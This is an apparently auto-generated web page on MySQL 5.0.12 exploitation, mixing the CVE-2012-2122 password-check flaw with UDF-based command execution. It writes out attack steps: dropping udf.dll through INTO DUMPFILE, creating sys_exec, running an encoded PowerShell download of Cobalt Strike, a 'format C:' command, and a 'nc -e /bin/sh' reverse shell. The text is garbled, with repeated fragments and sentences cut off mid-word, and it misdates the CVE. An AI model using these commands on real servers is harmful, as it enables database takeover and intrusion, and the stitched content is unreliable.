Exploit | Mysql 5.0.12

MySQL 5.0.12 Exploit: Understanding the Vulnerability

The Flaw: A bug in the password hashing comparison allows a user to log in with an incorrect password. Due to a casting error in the memcmp function, the check can occasionally return "true" even for wrong passwords. mysql 5.0.12 exploit

1. Used INTO DUMPFILE to write udf.dll to C:\Windows\Temp\.
2. Created sys_exec and sys_eval.
3. Ran sys_exec('powershell -enc base64...') to download Cobalt Strike.
4. Pivoted to the domain controller, causing a $6M breach.

The Most Famous Exploit: CVE-2012-2122 (The "1 in 256" Flaw) MySQL 5

He didn’t run sys_exec('cmd.exe /c format C:'). That was amateur hour. Instead, he ran: Used INTO DUMPFILE to write udf

1. Version Upgrades (The Obvious Fix)

MySQL 5.0.15 and later introduced strict checks: Only users with INSERT privilege on mysql.func could create UDFs. MySQL 5.1 added the plugin_dir variable, requiring libraries to reside in a dedicated, non-writable directory.

-- Create the function mapping CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.so'; -- Verify the function exists SELECT * FROM mysql.func; -- Execute a command (e.g., creating a reverse shell) SELECT sys_exec('nc -e /bin/sh '); Use code with caution. Copied to clipboard 3. Impact and Remediation